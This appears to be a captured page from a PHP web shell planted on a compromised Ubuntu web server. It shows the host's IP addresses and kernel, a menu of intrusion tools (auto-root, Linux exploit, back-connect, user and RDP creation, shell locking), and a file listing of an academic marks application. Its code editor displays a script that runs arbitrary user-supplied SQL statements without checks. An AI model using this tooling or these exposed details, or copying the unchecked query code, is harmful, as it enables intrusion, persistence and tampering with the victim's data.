Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.141.198.75
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
custom_src_old /
[ HOME SHELL ]
Name
Size
Permission
Action
TarkaFormatStyles.php
10.67
KB
-rwxr-xr-x
batch_wise_details.php
13.76
KB
-rwxr-xr-x
custom_mregistry.php
3.2
KB
-rwxr-xr-x
dash_board.php
1.44
KB
-rwxr-xr-x
evaluation.php
16.27
KB
-rwxr-xr-x
execute_query.php
784
B
-rwxr-xr-x
freeze_marks.php
4.83
KB
-rwxr-xr-x
getMapAtEmployeeIdQuery.php
4.33
KB
-rwxr-xr-x
getRightValuesForLoggedinUser....
2.35
KB
-rwxr-xr-x
get_fm_emp_list.php
3.28
KB
-rwxr-xr-x
get_search_conditon.php
2.14
KB
-rwxr-xr-x
ggridGetQuery.php
1.61
KB
-rwxr-xr-x
month_year.php
2.67
KB
-rwxr-xr-x
parseini.php
807
B
-rwxr-xr-x
practical_entry_freezing witho...
9.5
KB
-rwxr-xr-x
practical_entry_freezing.php
10.73
KB
-rwxr-xr-x
practical_marks_details.php
11.78
KB
-rwxr-xr-x
practical_marks_misc.php
10.27
KB
-rwxr-xr-x
report_practical_misc.php
5.94
KB
-rwxr-xr-x
report_setup.php
88.32
KB
-rwxr-xr-x
transactions.php
51.2
KB
-rwxr-xr-x
user_report.php
6.41
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : execute_query.php
<?php function saveExcuteUserDefinedQuery($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $execute_query= (trim($aobj_context->mobj_data["execute_query"])); $arr_execute_query=explode(';',$execute_query); foreach($arr_execute_query as $k=>$v) { if(!empty($v)) { $lobj_execute_query = $aobj_context->mobj_db->Execute($v); } } if($lobj_execute_query) { $rdata = "Query Executed Successfully."; print_r($aobj_context->mobj_output->ToJSONEnvelope($rdata,0,"success")); return $rdata; } else { $rdata = "Execution Failed."; print_r($aobj_context->mobj_output->ToJSONEnvelope($rdata,-1,"Failure")); return $rdata; } } ?>
Close